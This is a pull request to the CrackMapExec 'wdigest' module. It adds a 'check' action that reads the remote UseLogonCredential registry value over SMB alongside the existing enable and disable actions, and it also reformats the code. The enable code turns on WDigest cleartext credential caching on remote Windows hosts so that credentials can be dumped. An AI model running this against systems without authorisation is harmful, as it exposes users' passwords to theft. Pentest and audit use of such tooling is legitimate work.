### PR TITLE
Added option to wdigest module to check registry key without editing it

### DIFF
--- a/cme/modules/wdigest.py
+++ b/cme/modules/wdigest.py
@@ -16,7 +16,7 @@ class CMEModule:
 
     def options(self, context, module_options):
         """
-        ACTION  Create/Delete the registry key (choices: enable, disable)
+        ACTION  Create/Delete the registry key (choices: enable, disable, check)
         """
 
         if not "ACTION" in module_options:
@@ -132,12 +132,12 @@ class CMEModule:
                 if int(data) == 1:
                     context.log.success("UseLogonCredential registry key is enabled")
                 else:
-                    context.log.error("Unexpected registry value for UseLogonCredential: %s" % data)
+                    context.log.fail("Unexpected registry value for UseLogonCredential: %s" % data)
             except DCERPCException as d:
                 if "winreg.HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" in str(d):
-                    context.log.error("UseLogonCredential registry key is disabled (registry key not found)")
+                    context.log.fail("UseLogonCredential registry key is disabled (registry key not found)")
                 else:
-                    context.log.error("UseLogonCredential registry key not present")
+                    context.log.fail("UseLogonCredential registry key not present")
             try:
                 remoteOps.finish()
             except:

--- a/cme/modules/wdigest.py
+++ b/cme/modules/wdigest.py
@@ -6,34 +6,36 @@ from impacket.dcerpc.v5 import rrp
 from impacket.examples.secretsdump import RemoteOperations
 from sys import exit
 
-
 class CMEModule:
-    name = "wdigest"
+
+    name = 'wdigest'
     description = "Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1"
-    supported_protocols = ["smb"]
+    supported_protocols = ['smb']
     opsec_safe = True
     multiple_hosts = True
 
     def options(self, context, module_options):
-        """
-        ACTION  Create/Delete the registry key (choices: enable, disable)
-        """
+        '''
+            ACTION  Create/Delete the registry key (choices: enable, disable, check)
+        '''
 
-        if not "ACTION" in module_options:
-            context.log.fail("ACTION option not specified!")
+        if not 'ACTION' in module_options:
+            context.log.error('ACTION option not specified!')
             exit(1)
 
-        if module_options["ACTION"].lower() not in ["enable", "disable"]:
-            context.log.fail("Invalid value for ACTION option!")
+        if module_options['ACTION'].lower() not in ['enable', 'disable', 'check']:
+            context.log.error('Invalid value for ACTION option!')
             exit(1)
 
-        self.action = module_options["ACTION"].lower()
+        self.action = module_options['ACTION'].lower()
 
     def on_admin_login(self, context, connection):
-        if self.action == "enable":
+        if self.action == 'enable':
             self.wdigest_enable(context, connection.conn)
-        elif self.action == "disable":
+        elif self.action == 'disable':
             self.wdigest_disable(context, connection.conn)
+        elif self.action == 'check':
+            self.wdigest_check(context, connection.conn)
 
     def wdigest_enable(self, context, smbconnection):
         remoteOps = RemoteOperations(smbconnection, False)
@@ -41,27 +43,17 @@ class CMEModule:
 
         if remoteOps._RemoteOperations__rrp:
             ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
-            regHandle = ans["phKey"]
+            regHandle = ans['phKey']
 
-            ans = rrp.hBaseRegOpenKey(
-                remoteOps._RemoteOperations__rrp,
-                regHandle,
-                "SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest",
-            )
-            keyHandle = ans["phkResult"]
+            ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
+            keyHandle = ans['phkResult']
 
-            rrp.hBaseRegSetValue(
-                remoteOps._RemoteOperations__rrp,
-                keyHandle,
-                "UseLogonCredential\x00",
-                rrp.REG_DWORD,
-                1,
-            )
+            rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00',  rrp.REG_DWORD, 1)
 
-            rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "UseLogonCredential\x00")
+            rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')
 
             if int(data) == 1:
-                context.log.success("UseLogonCredential registry key created successfully")
+                context.log.success('UseLogonCredential registry key created successfully')
 
         try:
             remoteOps.finish()
@@ -74,23 +66,15 @@ class CMEModule:
 
         if remoteOps._RemoteOperations__rrp:
             ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
-            regHandle = ans["phKey"]
+            regHandle = ans['phKey']
 
-            ans = rrp.hBaseRegOpenKey(
-                remoteOps._RemoteOperations__rrp,
-                regHandle,
-                "SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest",
-            )
-            keyHandle = ans["phkResult"]
+            ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
+            keyHandle = ans['phkResult']
 
             try:
-                rrp.hBaseRegDeleteValue(
-                    remoteOps._RemoteOperations__rrp,
-                    keyHandle,
-                    "UseLogonCredential\x00",
-                )
+                rrp.hBaseRegDeleteValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')
             except:
-                context.log.success("UseLogonCredential registry key not present")
+                context.log.success('UseLogonCredential registry key not present')
 
                 try:
                     remoteOps.finish()
@@ -100,16 +84,39 @@ class CMEModule:
                 return
 
             try:
-                # Check to make sure the reg key is actually deleted
-                rtype, data = rrp.hBaseRegQueryValue(
-                    remoteOps._RemoteOperations__rrp,
-                    keyHandle,
-                    "UseLogonCredential\x00",
-                )
+                #Check to make sure the reg key is actually deleted
+                rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')
             except DCERPCException:
-                context.log.success("UseLogonCredential registry key deleted successfully")
-
+                context.log.success('UseLogonCredential registry key deleted successfully')
+                
                 try:
                     remoteOps.finish()
                 except:
                     pass
+
+    def wdigest_check(self, context, smbconnection):
+        remoteOps = RemoteOperations(smbconnection, False)
+        remoteOps.enableRegistry()
+
+        if remoteOps._RemoteOperations__rrp:
+            ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
+            regHandle = ans['phKey']
+
+            ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
+            keyHandle = ans['phkResult']
+
+            try:
+                rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')
+                if int(data) == 1:
+                    context.log.success('UseLogonCredential registry key is enabled')
+                else:
+                    context.log.error('Unexpected registry value for UseLogonCredential: %s' % data)
+            except DCERPCException as d:
+                if 'winreg.HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest' in str(d):
+                    context.log.error('UseLogonCredential registry key is disabled (registry key not found)')
+                else:
+                    context.log.error('UseLogonCredential registry key not present')
+            try:
+                remoteOps.finish()
+            except:
+                pass

--- a/cme/modules/wdigest.py
+++ b/cme/modules/wdigest.py
@@ -8,33 +8,33 @@ from sys import exit
 
 class CMEModule:
 
-    name = 'wdigest'
+    name = "wdigest"
     description = "Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1"
-    supported_protocols = ['smb']
+    supported_protocols = ["smb"]
     opsec_safe = True
     multiple_hosts = True
 
     def options(self, context, module_options):
-        '''
-            ACTION  Create/Delete the registry key (choices: enable, disable, check)
-        '''
+        """
+        ACTION  Create/Delete the registry key (choices: enable, disable)
+        """
 
-        if not 'ACTION' in module_options:
-            context.log.error('ACTION option not specified!')
+        if not "ACTION" in module_options:
+            context.log.fail("ACTION option not specified!")
             exit(1)
 
-        if module_options['ACTION'].lower() not in ['enable', 'disable', 'check']:
-            context.log.error('Invalid value for ACTION option!')
+        if module_options["ACTION"].lower() not in ["enable", "disable", "check"]:
+            context.log.fail("Invalid value for ACTION option!")
             exit(1)
 
-        self.action = module_options['ACTION'].lower()
+        self.action = module_options["ACTION"].lower()
 
     def on_admin_login(self, context, connection):
-        if self.action == 'enable':
+        if self.action == "enable":
             self.wdigest_enable(context, connection.conn)
-        elif self.action == 'disable':
+        elif self.action == "disable":
             self.wdigest_disable(context, connection.conn)
-        elif self.action == 'check':
+        elif self.action == "check":
             self.wdigest_check(context, connection.conn)
 
     def wdigest_enable(self, context, smbconnection):
@@ -43,17 +43,27 @@ class CMEModule:
 
         if remoteOps._RemoteOperations__rrp:
             ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
-            regHandle = ans['phKey']
+            regHandle = ans["phKey"]
 
-            ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
-            keyHandle = ans['phkResult']
+            ans = rrp.hBaseRegOpenKey(
+                remoteOps._RemoteOperations__rrp,
+                regHandle,
+                "SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest",
+            )
+            keyHandle = ans["phkResult"]
 
-            rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00',  rrp.REG_DWORD, 1)
+            rrp.hBaseRegSetValue(
+                remoteOps._RemoteOperations__rrp,
+                keyHandle,
+                "UseLogonCredential\x00",
+                rrp.REG_DWORD,
+                1,
+            )
 
-            rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')
+            rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "UseLogonCredential\x00")
 
             if int(data) == 1:
-                context.log.success('UseLogonCredential registry key created successfully')
+                context.log.success("UseLogonCredential registry key created successfully")
 
         try:
             remoteOps.finish()
@@ -66,15 +76,23 @@ class CMEModule:
 
         if remoteOps._RemoteOperations__rrp:
             ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
-            regHandle = ans['phKey']
+            regHandle = ans["phKey"]
 
-            ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
-            keyHandle = ans['phkResult']
+            ans = rrp.hBaseRegOpenKey(
+                remoteOps._RemoteOperations__rrp,
+                regHandle,
+                "SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest",
+            )
+            keyHandle = ans["phkResult"]
 
             try:
-                rrp.hBaseRegDeleteValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')
+                rrp.hBaseRegDeleteValue(
+                    remoteOps._RemoteOperations__rrp,
+                    keyHandle,
+                    "UseLogonCredential\x00",
+                )
             except:
-                context.log.success('UseLogonCredential registry key not present')
+                context.log.success("UseLogonCredential registry key not present")
 
                 try:
                     remoteOps.finish()
@@ -84,11 +102,15 @@ class CMEModule:
                 return
 
             try:
-                #Check to make sure the reg key is actually deleted
-                rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')
+                # Check to make sure the reg key is actually deleted
+                rtype, data = rrp.hBaseRegQueryValue(
+                    remoteOps._RemoteOperations__rrp,
+                    keyHandle,
+                    "UseLogonCredential\x00",
+                )
             except DCERPCException:
-                context.log.success('UseLogonCredential registry key deleted successfully')
-                
+                context.log.success("UseLogonCredential registry key deleted successfully")
+
                 try:
                     remoteOps.finish()
                 except:
@@ -100,22 +122,22 @@ class CMEModule:
 
         if remoteOps._RemoteOperations__rrp:
             ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
-            regHandle = ans['phKey']
+            regHandle = ans["phKey"]
 
-            ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
-            keyHandle = ans['phkResult']
+            ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, "SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest")
+            keyHandle = ans["phkResult"]
 
             try:
-                rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')
+                rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "UseLogonCredential\x00")
                 if int(data) == 1:
-                    context.log.success('UseLogonCredential registry key is enabled')
+                    context.log.success("UseLogonCredential registry key is enabled")
                 else:
-                    context.log.error('Unexpected registry value for UseLogonCredential: %s' % data)
+                    context.log.error("Unexpected registry value for UseLogonCredential: %s" % data)
             except DCERPCException as d:
-                if 'winreg.HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest' in str(d):
-                    context.log.error('UseLogonCredential registry key is disabled (registry key not found)')
+                if "winreg.HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" in str(d):
+                    context.log.error("UseLogonCredential registry key is disabled (registry key not found)")
                 else:
-                    context.log.error('UseLogonCredential registry key not present')
+                    context.log.error("UseLogonCredential registry key not present")
             try:
                 remoteOps.finish()
             except:


### PR DESCRIPTION
Added this option since I needed it on a pentest where the client wanted a list of hosts with wdigest enabled. Did not want to modify or add existing key.

![vmware_EQ1tgrJNa9](https://github.com/mpgn/CrackMapExec/assets/52969604/2bdfcc2a-de48-4d50-be71-2cd59e5d338c)
